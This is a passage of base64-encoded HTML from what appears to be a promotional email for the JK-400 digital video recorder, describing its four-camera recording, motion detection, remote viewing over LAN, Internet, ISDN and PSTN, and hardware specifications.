 cDovLzIwMi42NC4yMDguMjUyL3Byb21vL2R2ci9kdnIuZ2lmIiB3aWR0aD0iMjM1IiBoZWlnaHQ9
 IjEzMiI+PC90ZD4NCiAgICAgICAgICAgIDx0ZCB3aWR0aD0iNDIyIj4mbmJzcDs8L3RkPg0KICAg
 ICAgICAgIDwvdHI+DQogICAgICAgICAgPHRyPiANCiAgICAgICAgICAgIDx0ZCB3aWR0aD0iNDIy
 Ij48Yj48Zm9udCBmYWNlPSJHZW5ldmEsIEFyaWFsLCBIZWx2ZXRpY2EsIHNhbi1zZXJpZiIgY29s
 b3I9IiMwMDAwRkYiPkNPU1QgDQogICAgICAgICAgICAgIC0gRUZGRUNUSVZFPC9mb250PjwvYj4g
 PC90ZD4NCiAgICAgICAgICA8L3RyPg0KICAgICAgICAgIDx0cj4gDQogICAgICAgICAgICA8dGQg
 aGVpZ2h0PSIxNTAiIHdpZHRoPSI0MjIiIHZhbGlnbj0idG9wIj4gDQogICAgICAgICAgICAgIDx0
 YWJsZSB3aWR0aD0iNDIxIiBib3JkZXI9IjAiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0i
 MCI+DQogICAgICAgICAgICAgICAgPHRyPiANCiAgICAgICAgICAgICAgICAgIDx0ZCB3aWR0aD0i
 ODUiPiZuYnNwOzwvdGQ+DQogICAgICAgICAgICAgICAgICA8dGQgcm93c3Bhbj0iMiIgd2lkdGg9
 IjMzNiI+PGZvbnQgZmFjZT0iVGltZXMgTmV3IFJvbWFuLCBUaW1lcywgc2VyaWYiPjxpPjxmb250
 IGNvbG9yPSIjMDAwMEZGIj5EaWdpdGFsIA0KICAgICAgICAgICAgICAgICAgICBWaWRlbyBNb25p
 dG9yaW5nICZhbXA7IFJlY29yZGluZyBTb2x1dGlvbnM8YnI+DQogICAgICAgICAgICAgICAgICAg
 IGZvciBPZmZpY2UsIFNob3AsIEhvbWUgJmFtcDsgRmFjdG9yeTwvZm9udD48L2k+PC9mb250Pjwv
 dGQ+DQogICAgICAgICAgICAgICAgPC90cj4NCiAgICAgICAgICAgICAgICA8dHI+IA0KICAgICAg
 ICAgICAgICAgICAgPHRkIHdpZHRoPSI4NSIgaGVpZ2h0PSIyMyI+Jm5ic3A7PC90ZD4NCiAgICAg
 ICAgICAgICAgICA8L3RyPg0KICAgICAgICAgICAgICA8L3RhYmxlPg0KICAgICAgICAgICAgICA8
 YnI+DQogICAgICAgICAgICAgIDxiPjxmb250IGZhY2U9IkdlbmV2YSwgQXJpYWwsIEhlbHZldGlj
 YSwgc2FuLXNlcmlmIiBjb2xvcj0iIzAwMDBGRiI+TmV3IA0KICAgICAgICAgICAgICB0ZWNobm9s
 b2d5PC9mb250PjwvYj48YnI+DQogICAgICAgICAgICAgIDxmb250IGZhY2U9IkFyaWFsLCBIZWx2
 ZXRpY2EsIHNhbnMtc2VyaWYiIHNpemU9IjIiIGNvbG9yPSIjMDAwMEZGIj4tIA0KICAgICAgICAg
 ICAgICBTdXBwb3J0IER5bmFtaWMgSVA8YnI+DQogICAgICAgICAgICAgIC0gNCBWaWRlbyAmYW1w
 OyA0IEF1ZGlvIElucHV0PGJyPg0KICAgICAgICAgICAgICAtIFJlYWwgVGltZSBEaXNwbGF5IGFu
 ZCBSZWNvcmRpbmc8L2ZvbnQ+IDxicj4NCiAgICAgICAgICAgIDwvdGQ+DQogICAgICAgICAgPC90
 cj4NCiAgICAgICAgPC90YWJsZT4NCiAgICAgICAgPHRhYmxlIHdpZHRoPSI2ODAiIGJvcmRlcj0i
 MCIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIwIiBib3JkZXJjb2xvcj0iIzAwMDBGRiI+
 DQogICAgICAgICAgPHRyPiANCiAgICAgICAgICAgIDx0ZCBiZ2NvbG9yPSIjMDAwMEZGIiBoZWln
 aHQ9IjI3Ij4gDQogICAgICAgICAgICAgIDxkaXYgYWxpZ249ImNlbnRlciI+PGZvbnQgY29sb3I9
 IiNGRkZGRkYiIGZhY2U9IlZlcmRhbmEsIEFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiPjxi
 PlRlY2huaWNhbCANCiAgICAgICAgICAgICAgICBTcGVjaWZpY2F0aW9uczwvYj48L2ZvbnQ+PC9k
 aXY+DQogICAgICAgICAgICA8L3RkPg0KICAgICAgICAgIDwvdHI+DQogICAgICAgIDwvdGFibGU+
 DQogICAgICAgIDx0YWJsZSB3aWR0aD0iNjgwIiBib3JkZXI9IjAiIGNlbGxzcGFjaW5nPSIwIiBj
 ZWxscGFkZGluZz0iMCI+DQogICAgICAgICAgPHRyPiANCiAgICAgICAgICAgIDx0ZCBiZ2NvbG9y
 PSIjQ0NDQ0NDIj4gDQogICAgICAgICAgICAgIDxkaXYgYWxpZ249ImNlbnRlciI+PGZvbnQgc2l6
 ZT0iMiIgZmFjZT0iQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiI+PGI+TmV3IA0KICAgICAg
 ICAgICAgICAgIFRlY2hub2xvZ3k8L2I+PC9mb250PjwvZGl2Pg0KICAgICAgICAgICAgPC90ZD4N
 CiAgICAgICAgICA8L3RyPg0KICAgICAgICA8L3RhYmxlPg0KICAgICAgICA8dGFibGUgd2lkdGg9
 IjY4MCIgYm9yZGVyPSIwIiBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjAiPg0KICAgICAg
 ICAgIDx0cj4gDQogICAgICAgICAgICA8dGQgd2lkdGg9IjIyNyIgdmFsaWduPSJ0b3AiPjxmb250
 IGZhY2U9IkFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiIHNpemU9IjIiPjxiPlN1cHBvcnQg
 DQogICAgICAgICAgICAgIER5bmFtaWMgSVA8L2I+PC9mb250PjwvdGQ+DQogICAgICAgICAgICA8
 dGQgd2lkdGg9IjQ1MyI+PGZvbnQgc2l6ZT0iMiIgZmFjZT0iQXJpYWwsIEhlbHZldGljYSwgc2Fu
 cy1zZXJpZiI+KiANCiAgICAgICAgICAgICAgT3VyIDxiPjxmb250IGNvbG9yPSIjRkY2NjAwIj5T
 bWFydElQPC9mb250PjwvYj4gVHJhY2luZyB0ZWNobm9sb2d5IA0KICAgICAgICAgICAgICBlbmFi
 bGUgdGhlIEpLLTQwMCBjb25uZWN0IHRoZSBJbnRlcm5ldCB0aHJvdWdoIEFEU0wgd2l0aCBkeW5h
 bWljIA0KICAgICAgICAgICAgICBJUCBhZGRyZXNzIHdoaWNoIHdpbGwgZ3JlYXRseSByZWR1Y2Vz
 IHlvdXIgaW50ZXJuZXQgY29zdC48L2ZvbnQ+PC90ZD4NCiAgICAgICAgICA8L3RyPg0KICAgICAg
 ICAgIDx0cj4gDQogICAgICAgICAgICA8dGQgd2lkdGg9IjIyNyI+PGZvbnQgZmFjZT0iQXJpYWws
 IEhlbHZldGljYSwgc2Fucy1zZXJpZiIgc2l6ZT0iMiI+PGI+NCANCiAgICAgICAgICAgICAgVmlk
 ZW8gJmFtcDsgQXVkaW8gU2lnbmFsIElucHV0PC9iPjwvZm9udD48L3RkPg0KICAgICAgICAgICAg
 PHRkIHdpZHRoPSI0NTMiPjxmb250IGZhY2U9IkFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYi
 IHNpemU9IjIiPiogDQogICAgICAgICAgICAgIDQgdmlkZW8vYXVkaW8gaW5wdXQgdG8gcmVjb3Jk
 IGltYWdlcyBhbmQgc291bmQgYXQgdGhlIHNhbWUgdGltZS48L2ZvbnQ+PC90ZD4NCiAgICAgICAg
 ICA8L3RyPg0KICAgICAgICAgIDx0cj4gDQogICAgICAgICAgICA8dGQgd2lkdGg9IjIyNyIgdmFs
 aWduPSJ0b3AiPjxmb250IGZhY2U9IkFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiIHNpemU9
 IjIiPjxiPlJlYWwgDQogICAgICAgICAgICAgIFRpbWUgRGlzcGxheSBhbmQgUmVjb3JkaW5nPC9i
 PjwvZm9udD48L3RkPg0KICAgICAgICAgICAgPHRkIHdpZHRoPSI0NTMiPjxmb250IGZhY2U9IkFy
 aWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiIHNpemU9IjIiPiogDQogICAgICAgICAgICAgIFVw
 IHRvIDEwMCBmcmFtZXMgcGVyIHNlY29uZCBvciAzMCBmcmFtZXMgcGVyIGNhbWVyYSBpbiBtb25p
 dG9yaW5nLCANCiAgICAgICAgICAgICAgcmVjb3JkaW5nIGFuZCBwbGF5YmFjazwvZm9udD48L3Rk
 Pg0KICAgICAgICAgIDwvdHI+DQogICAgICAgIDwvdGFibGU+DQogICAgICAgIDx0YWJsZSB3aWR0
 aD0iNjgwIiBib3JkZXI9IjAiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMCI+DQogICAg
 ICAgICAgPHRyPiANCiAgICAgICAgICAgIDx0ZCBiZ2NvbG9yPSIjQ0NDQ0NDIj4gDQogICAgICAg
 ICAgICAgIDxkaXYgYWxpZ249ImNlbnRlciI+PGZvbnQgZmFjZT0iQXJpYWwsIEhlbHZldGljYSwg
 c2Fucy1zZXJpZiIgc2l6ZT0iMiI+PGI+VmlkZW8gDQogICAgICAgICAgICAgICAgRmVhdHVyZXM8
 L2I+PC9mb250PjwvZGl2Pg0KICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICA8L3RyPg0KICAg
 ICAgICA8L3RhYmxlPg0KICAgICAgICA8dGFibGUgd2lkdGg9IjY3MyIgYm9yZGVyPSIwIiBjZWxs
 c3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjAiPg0KICAgICAgICAgIDx0cj4gDQogICAgICAgICAg
 ICA8dGQgd2lkdGg9IjIyNCI+PGI+PGZvbnQgZmFjZT0iQXJpYWwsIEhlbHZldGljYSwgc2Fucy1z
 ZXJpZiIgc2l6ZT0iMiI+VmlkZW8gDQogICAgICAgICAgICAgIElucHV0PC9mb250PjwvYj48L3Rk
 Pg0KICAgICAgICAgICAgPHRkIHdpZHRoPSI0NDkiPjxmb250IGZhY2U9IkFyaWFsLCBIZWx2ZXRp
 Y2EsIHNhbnMtc2VyaWYiIHNpemU9IjIiPiogDQogICAgICAgICAgICAgIFVwIHRvIDQgdmlkZW8g
 aW5wdXRzPC9mb250PjwvdGQ+DQogICAgICAgICAgPC90cj4NCiAgICAgICAgICA8dHI+IA0KICAg
 ICAgICAgICAgPHRkIHdpZHRoPSIyMjQiPjxiPjxmb250IGZhY2U9IkFyaWFsLCBIZWx2ZXRpY2Es
 IHNhbnMtc2VyaWYiIHNpemU9IjIiPlZpZGVvIA0KICAgICAgICAgICAgICBkaXNwbGF5PC9mb250
 PjwvYj48L3RkPg0KICAgICAgICAgICAgPHRkIHdpZHRoPSI0NDkiPjxmb250IGZhY2U9IkFyaWFs
 LCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiIHNpemU9IjIiPiogDQogICAgICAgICAgICAgIERpc3Bs
 YXkgb24gU1ZHQSBtb25pdG9yIG9yIE5UU0MvUEFMIHZpZGVvIG1vbml0b3IgPGJyPg0KICAgICAg
 ICAgICAgICAqIERpc3BsYXkgcmVhbC10aW1lIHZpZGVvIGF0IG9wdGltdW0gY29uZGl0aW9uIG9m
 IHVwIHRvIDQgY2hhbm5lbHM8L2ZvbnQ+PC90ZD4NCiAgICAgICAgICA8L3RyPg0KICAgICAgICAg
 IDx0cj4gDQogICAgICAgICAgICA8dGQgd2lkdGg9IjIyNCI+PGI+PGZvbnQgZmFjZT0iQXJpYWws
 IEhlbHZldGljYSwgc2Fucy1zZXJpZiIgc2l6ZT0iMiI+VmlkZW8gDQogICAgICAgICAgICAgIGRp
 c3BsYXkgcmVzb2x1dGlvbjwvZm9udD48L2I+PC90ZD4NCiAgICAgICAgICAgIDx0ZCB3aWR0aD0i
 NDQ5Ij48Zm9udCBmYWNlPSJBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIiBzaXplPSIyIj4q
 IA0KICAgICAgICAgICAgICBWaWRlbyBkaXNwbGF5IHJlc29sdXRpb24gb24gNzY4eDU3NiAoUEFM
 KSwgNjQweDQ4MChOVFNDKTwvZm9udD48L3RkPg0KICAgICAgICAgIDwvdHI+DQogICAgICAgICAg
 PHRyPiANCiAgICAgICAgICAgIDx0ZCB3aWR0aD0iMjI0IiBoZWlnaHQ9IjExMSI+PGI+PGZvbnQg
 ZmFjZT0iQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiIgc2l6ZT0iMiI+QnVpbHQtaW4gDQog
 ICAgICAgICAgICAgIG11bHRpcGxleGVyIGRpc3BsYXkgbW9kZXM8L2ZvbnQ+PC9iPjwvdGQ+DQog
 ICAgICAgICAgICA8dGQgd2lkdGg9IjQ0OSIgaGVpZ2h0PSIxMTEiIHZhbGlnbj0ibWlkZGxlIiBh
 bGlnbj0iY2VudGVyIj4gDQogICAgICAgICAgICAgIDx0YWJsZSB3aWR0aD0iNDE5IiBib3JkZXI9
 IjAiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMCI+DQogICAgICAgICAgICAgICAgPHRy
 PiANCiAgICAgICAgICAgICAgICAgIDx0ZCB3aWR0aD0iMTg1Ij48Zm9udCBmYWNlPSJBcmlhbCwg
 SGVsdmV0aWNhLCBzYW5zLXNlcmlmIiBzaXplPSIyIj48aW1nIHNyYz0iaHR0cDovLzIwMi42NC4y
 MDguMjUyL3Byb21vL2R2ci9waWMxLmdpZiIgd2lkdGg9IjEyOCIgaGVpZ2h0PSIxMDMiPjwvZm9u
 dD48L3RkPg0KICAgICAgICAgICAgICAgICAgPHRkIHdpZHRoPSIyMzQiPjxmb250IGZhY2U9IkFy
 aWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiIHNpemU9IjIiPjxpbWcgc3JjPSJodHRwOi8vMjAy
 LjY0LjIwOC4yNTIvcHJvbW8vZHZyL3BpYzIuZ2lmIiB3aWR0aD0iMTEwIiBoZWlnaHQ9Ijg5Ij48
 L2ZvbnQ+PC90ZD4NCiAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAgICAgICAgICA8L3RhYmxl
 Pg0KICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICA8L3RyPg0KICAgICAgICAgIDx0cj4gDQog
 ICAgICAgICAgICA8dGQgd2lkdGg9IjIyNCI+PGI+PGZvbnQgZmFjZT0iQXJpYWwsIEhlbHZldGlj
 YSwgc2Fucy1zZXJpZiIgc2l6ZT0iMiI+VGltZSANCiAgICAgICAgICAgICAgJmFtcDsgRGF0ZSBz
 dGFtcDwvZm9udD48L2I+PC90ZD4NCiAgICAgICAgICAgIDx0ZCB3aWR0aD0iNDQ5Ij48Zm9udCBm
 YWNlPSJBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIiBzaXplPSIyIj5UaW1lIA0KICAgICAg
 ICAgICAgICBhbmQgZGF0ZSBvdmVybGF5IG9uIGVhY2ggY2FtZXJhIGZvciBkaXNwbGF5IGFuZCBy
 ZWNvcmRpbmc8L2ZvbnQ+PC90ZD4NCiAgICAgICAgICA8L3RyPg0KICAgICAgICA8L3RhYmxlPg0K
 ICAgICAgICA8dGFibGUgd2lkdGg9IjY4MCIgYm9yZGVyPSIwIiBjZWxsc3BhY2luZz0iMCIgY2Vs
 bHBhZGRpbmc9IjAiPg0KICAgICAgICAgIDx0cj4gDQogICAgICAgICAgICA8dGQgYmdjb2xvcj0i
 I0NDQ0NDQyI+IA0KICAgICAgICAgICAgICA8ZGl2IGFsaWduPSJjZW50ZXIiPjxmb250IGZhY2U9
 IlZlcmRhbmEsIEFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiPjxiPjxmb250IHNpemU9IjIi
 PlJlY29yZGluZyANCiAgICAgICAgICAgICAgICBGZWF0dXJlczwvZm9udD48L2I+PC9mb250Pjwv
 ZGl2Pg0KICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICA8L3RyPg0KICAgICAgICA8L3RhYmxl
 Pg0KICAgICAgICA8dGFibGUgd2lkdGg9IjY4MCIgYm9yZGVyPSIwIiBjZWxsc3BhY2luZz0iMCIg
 Y2VsbHBhZGRpbmc9IjAiPg0KICAgICAgICAgIDx0cj4gDQogICAgICAgICAgICA8dGQgd2lkdGg9
 IjIyOCI+PGI+PGZvbnQgZmFjZT0iQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiIgc2l6ZT0i
 MiI+RGlnaXRhbCANCiAgICAgICAgICAgICAgdmlkZW8gcmVjb3JkaW5nPC9mb250PjwvYj48L3Rk
 Pg0KICAgICAgICAgICAgPHRkIHdpZHRoPSI0NTIiPjxmb250IGZhY2U9IkFyaWFsLCBIZWx2ZXRp
 Y2EsIHNhbnMtc2VyaWYiIHNpemU9IjIiPiogDQogICAgICAgICAgICAgIFRvdGFsIHJlY29yZGlu
 ZyBmcmFtZSByYXRlIGlzIDEwMGYvcyA8YnI+DQogICAgICAgICAgICAgICogQWR1c3RhYmxlIGZy
 YW1lIHJhdGUsIHJlc29sdXRpb24gYW5kIHJlY29yZGluZyBmaWxlIGxlbmd0aCBmb3IgDQogICAg
 ICAgICAgICAgIFJyZWNvcmRpbmc8L2ZvbnQ+PC90ZD4NCiAgICAgICAgICA8L3RyPg0KICAgICAg
 ICAgIDx0cj4gDQogICAgICAgICAgICA8dGQgd2lkdGg9IjIyOCI+PGI+PGZvbnQgZmFjZT0iQXJp
 YWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiIgc2l6ZT0iMiI+Q29tcHJlc3Npb24gDQogICAgICAg
 ICAgICAgIGZvciBkaWdpdGFsIHZpZGVvIHJlY29yZGluZzwvZm9udD48L2I+PC90ZD4NCiAgICAg
 ICAgICAgIDx0ZCB3aWR0aD0iNDUyIj48Zm9udCBmYWNlPSJBcmlhbCwgSGVsdmV0aWNhLCBzYW5z
 LXNlcmlmIiBzaXplPSIyIj4qIA0KICAgICAgICAgICAgICBXYXZlbGV0IG9yIE1QRUctNCBjb21w
 cmVzc2lvbiB0ZWNobm9sb2d5IHdpdGggNC41ay9mcmFtZTwvZm9udD48L3RkPg0KICAgICAgICAg
 IDwvdHI+DQogICAgICAgICAgPHRyPiANCiAgICAgICAgICAgIDx0ZCB3aWR0aD0iMjI4Ij48Yj48
 Zm9udCBmYWNlPSJBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIiBzaXplPSIyIj5TY2hlZHVs
 ZSANCiAgICAgICAgICAgICAgcmVjb3JkaW5nPC9mb250PjwvYj48L3RkPg0KICAgICAgICAgICAg
 PHRkIHdpZHRoPSI0NTIiPjxmb250IGZhY2U9IkFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYi
 IHNpemU9IjIiPiogDQogICAgICAgICAgICAgIEEgcHJvZ3JhbW1hYmxlIHRpbWVyIGFsbG93cyB1
 c2VyIHRvIHByb2dyYW1tZSBkaWZmZXJlbnQgcmVjb3JkaW5nIA0KICAgICAgICAgICAgICBzY2hl
 ZHVsZSBwYXR0ZXJucyBhdCBkaWZmZXJlbnQgdGltZXMgZm9yIGVhY2ggY2FtZXJhPC9mb250Pjwv
 dGQ+DQogICAgICAgICAgPC90cj4NCiAgICAgICAgICA8dHI+IA0KICAgICAgICAgICAgPHRkIHdp
 ZHRoPSIyMjgiPjxiPjxmb250IGZhY2U9IkFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiIHNp
 emU9IjIiPk1vdGlvbiANCiAgICAgICAgICAgICAgZGV0ZWN0aW9uIHJlY29yZGluZzwvZm9udD48
 L2I+PC90ZD4NCiAgICAgICAgICAgIDx0ZCB3aWR0aD0iNDUyIj48Zm9udCBmYWNlPSJBcmlhbCwg
 SGVsdmV0aWNhLCBzYW5zLXNlcmlmIiBzaXplPSIyIj4qIA0KICAgICAgICAgICAgICBWaWRlbyBt
 b3Rpb24gZGV0ZWN0aW9uIG9uIGVhY2ggdmlkZW8gaW5wdXQ8L2ZvbnQ+PC90ZD4NCiAgICAgICAg
 ICA8L3RyPg0KICAgICAgICA8L3RhYmxlPg0KICAgICAgICA8dGFibGUgd2lkdGg9IjY4MCIgYm9y
 ZGVyPSIwIiBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjAiPg0KICAgICAgICAgIDx0cj4g
 DQogICAgICAgICAgICA8dGQgYmdjb2xvcj0iI0NDQ0NDQyI+IA0KICAgICAgICAgICAgICA8ZGl2
 IGFsaWduPSJjZW50ZXIiPjxmb250IGZhY2U9IlZlcmRhbmEsIEFyaWFsLCBIZWx2ZXRpY2EsIHNh
 bnMtc2VyaWYiIHNpemU9IjIiPjxiPlBsYXliYWNrIA0KICAgICAgICAgICAgICAgIEZlYXR1cmVz
 PC9iPjwvZm9udD48L2Rpdj4NCiAgICAgICAgICAgIDwvdGQ+DQogICAgICAgICAgPC90cj4NCiAg
 ICAgICAgPC90YWJsZT4NCiAgICAgICAgPHRhYmxlIHdpZHRoPSI2ODAiIGJvcmRlcj0iMCIgY2Vs
 bHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIwIiBoZWlnaHQ9IjMyIj4NCiAgICAgICAgICA8dHI+
 IA0KICAgICAgICAgICAgPHRkIHdpZHRoPSIyMjgiPjxiPjxmb250IGZhY2U9IkFyaWFsLCBIZWx2
 ZXRpY2EsIHNhbnMtc2VyaWYiIHNpemU9IjIiPiANCiAgICAgICAgICAgICAgUGxheWJhY2s8L2Zv
 bnQ+PC9iPjwvdGQ+DQogICAgICAgICAgICA8dGQgd2lkdGg9IjQ1MiI+PGZvbnQgc2l6ZT0iMiIg
 ZmFjZT0iQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiI+KiANCiAgICAgICAgICAgICAgUGxh
 eWJhY2sgYXQgZGlmZmVyZW50IHNwZWVkLCBzaHV0dGxlIGZvcndhcmQgYW5kIGJhY2t3YXJkIDwv
 Zm9udD48L3RkPg0KICAgICAgICAgIDwvdHI+DQogICAgICAgICAgPHRyPiANCiAgICAgICAgICAg
 IDx0ZCB3aWR0aD0iMjI4IiBoZWlnaHQ9IjI1Ij48Yj48Zm9udCBmYWNlPSJBcmlhbCwgSGVsdmV0
 aWNhLCBzYW5zLXNlcmlmIiBzaXplPSIyIj5JbnRlbGxpZ2VudCANCiAgICAgICAgICAgICAgc2Vh
 cmNoIGZ1bmN0aW9ucyA8YnI+DQogICAgICAgICAgICAgIDwvZm9udD48L2I+PC90ZD4NCiAgICAg
 ICAgICAgIDx0ZCB3aWR0aD0iNDUyIiBoZWlnaHQ9IjI1Ij48Zm9udCBzaXplPSIyIiBmYWNlPSJB
 cmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIj4qIA0KICAgICAgICAgICAgICBWaWRlbyByZWNv
 cmRlZCBjYW4gYmUgcGxheWVkIGJhY2sgYnkgY2FtZXJhIGV2ZW50IG9yIGluIHRpbWUgYW5kIA0K
 ICAgICAgICAgICAgICBkYXRlIGZvciB2aWRlbyBzZWFyY2ggPC9mb250PjwvdGQ+DQogICAgICAg
 ICAgPC90cj4NCiAgICAgICAgPC90YWJsZT4NCiAgICAgICAgPHRhYmxlIHdpZHRoPSI2ODAiIGJv
 cmRlcj0iMCIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIwIiBib3JkZXJjb2xvcj0iI0ND
 Q0NDQyI+DQogICAgICAgICAgPHRyPiANCiAgICAgICAgICAgIDx0ZCBiZ2NvbG9yPSIjQ0NDQ0ND
 Ij4gDQogICAgICAgICAgICAgIDxkaXYgYWxpZ249ImNlbnRlciI+PGZvbnQgZmFjZT0iVmVyZGFu
 YSwgQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiIgc2l6ZT0iMiI+PGI+UmVtb3RlIA0KICAg
 ICAgICAgICAgICAgIFN5c3RlbSBTb2Z0d2FyZTwvYj48L2ZvbnQ+PC9kaXY+DQogICAgICAgICAg
 ICA8L3RkPg0KICAgICAgICAgIDwvdHI+DQogICAgICAgIDwvdGFibGU+DQogICAgICAgIDx0YWJs
 ZSB3aWR0aD0iNjgwIiBib3JkZXI9IjAiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMCI+
 DQogICAgICAgICAgPHRyPiANCiAgICAgICAgICAgIDx0ZCB3aWR0aD0iMjI4IiBoZWlnaHQ9IjI2
 Ij48Yj48Zm9udCBmYWNlPSJBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIiBzaXplPSIyIj5S
 ZW1vdGUgDQogICAgICAgICAgICAgIHZpZXdpbmcgYW5kIHJlY29yZGluZyA8YnI+DQogICAgICAg
 ICAgICAgIDwvZm9udD48L2I+PC90ZD4NCiAgICAgICAgICAgIDx0ZCB3aWR0aD0iNDUyIiBoZWln
 aHQ9IjI2Ij48Zm9udCBmYWNlPSJBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIiBzaXplPSIy
 Ij5TdXBwb3J0IA0KICAgICAgICAgICAgICBNdWx0aS1zaXRlcyBjYW1lcmEgb25saW5lIHZpZXdp
 bmcgdmlhIExBTiwgSW50ZXJuZXQsIElTRE4gYW5kIFBTVE48L2ZvbnQ+PC90ZD4NCiAgICAgICAg
 ICA8L3RyPg0KICAgICAgICAgIDx0cj4gDQogICAgICAgICAgICA8dGQgd2lkdGg9IjIyOCI+PGI+
 PGZvbnQgZmFjZT0iQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiIgc2l6ZT0iMiI+UmVtb3Rl
 IA0KICAgICAgICAgICAgICBwbGF5YmFjayByZWNvcmRlZCB2aWRlbzxicj4NCiAgICAgICAgICAg
 ICAgJmFtcDsgYXVkaW8gPGJyPg0KICAgICAgICAgICAgICA8L2ZvbnQ+PC9iPjwvdGQ+DQogICAg
 ICAgICAgICA8dGQgd2lkdGg9IjQ1MiI+PGZvbnQgZmFjZT0iQXJpYWwsIEhlbHZldGljYSwgc2Fu
 cy1zZXJpZiIgc2l6ZT0iMiI+SW1hZ2UgDQogICAgICAgICAgICAgIHJlY29yZGVkIGNhbiBiZSBy
 ZXRyaWV2ZWQgYXQgdGhlIHJlbW90ZSBzdGF0aW9uIHZpYSBMQU4sIEludGVybmV0LCANCiAgICAg
 ICAgICAgICAgSVNETiBhbmQgUFNUTjwvZm9udD48L3RkPg0KICAgICAgICAgIDwvdHI+DQogICAg
 ICAgICAgPHRyPiANCiAgICAgICAgICAgIDx0ZCB3aWR0aD0iMjI4Ij48Yj48Zm9udCBmYWNlPSJB
 cmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIiBzaXplPSIyIj5QYW4gDQogICAgICAgICAgICAg
 IC8gVGlsdCAvIFpvb20gPGJyPg0KICAgICAgICAgICAgICA8L2ZvbnQ+PC9iPjwvdGQ+DQogICAg
 ICAgICAgICA8dGQgd2lkdGg9IjQ1MiI+PGZvbnQgZmFjZT0iQXJpYWwsIEhlbHZldGljYSwgc2Fu
 cy1zZXJpZiIgc2l6ZT0iMiI+UmVtb3RlIA0KICAgICAgICAgICAgICBQYW4gLyBUaWx0IC8gWm9v
 bSBmdW5jdGlvbnMgdmlhIExhbiwgSW50ZXJuZXQsIElTRE4gYW5kIFBTVE48L2ZvbnQ+PC90ZD4N
 CiAgICAgICAgICA8L3RyPg0KICAgICAgICA8L3RhYmxlPg0KICAgICAgICA8dGFibGUgd2lkdGg9
 IjY4MCIgYm9yZGVyPSIwIiBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjAiPg0KICAgICAg
 ICAgIDx0cj4gDQogICAgICAgICAgICA8dGQgYmdjb2xvcj0iI0NDQ0NDQyI+IA0KICAgICAgICAg
 ICAgICA8ZGl2IGFsaWduPSJjZW50ZXIiPjxmb250IGZhY2U9IlZlcmRhbmEsIEFyaWFsLCBIZWx2
 ZXRpY2EsIHNhbnMtc2VyaWYiIHNpemU9IjIiPjxiPlN5c3RlbSANCiAgICAgICAgICAgICAgICBT
 cGVjaWZpY2F0aW9uPC9iPjwvZm9udD48L2Rpdj4NCiAgICAgICAgICAgIDwvdGQ+DQogICAgICAg
 ICAgPC90cj4NCiAgICAgICAgPC90YWJsZT4NCiAgICAgICAgPHRhYmxlIHdpZHRoPSI2ODAiIGJv
 cmRlcj0iMCIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIwIj4NCiAgICAgICAgICA8dHI+
 IA0KICAgICAgICAgICAgPHRkIHdpZHRoPSIyMjgiPjxmb250IGZhY2U9IkFyaWFsLCBIZWx2ZXRp
 Y2EsIHNhbnMtc2VyaWYiIHNpemU9IjIiPjxiPlNwZWNpZmljYXRpb248L2I+PC9mb250PjwvdGQ+
 DQogICAgICAgICAgICA8dGQgd2lkdGg9IjQ1MiI+PGZvbnQgZmFjZT0iQXJpYWwsIEhlbHZldGlj
 YSwgc2Fucy1zZXJpZiIgc2l6ZT0iMiI+UDQgDQogICAgICAgICAgICAgIDEuNk1oeiwgMTIwR0Ig
 SGRkLCAzLjUmcXVvdDtGREQsIDI1Nk1CIFJhbSwgOHg4eDMyIENELVIvUlcsIGJ1aWx0LWluIA0K
 ICAgICAgICAgICAgICAxMC8xMDBNIExBTiBjYXJkPC9mb250PjwvdGQ+DQogICAgICAgICAgPC90
 cj4NCiAgICAgICAgPC90YWJsZT4NCiAgICAgICAgPHRhYmxlIHdpZHRoPSI2ODAiIGJvcmRlcj0i
 MCIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIwIj4NCiAgICAgICAgICA8dHI+IA0KICAg
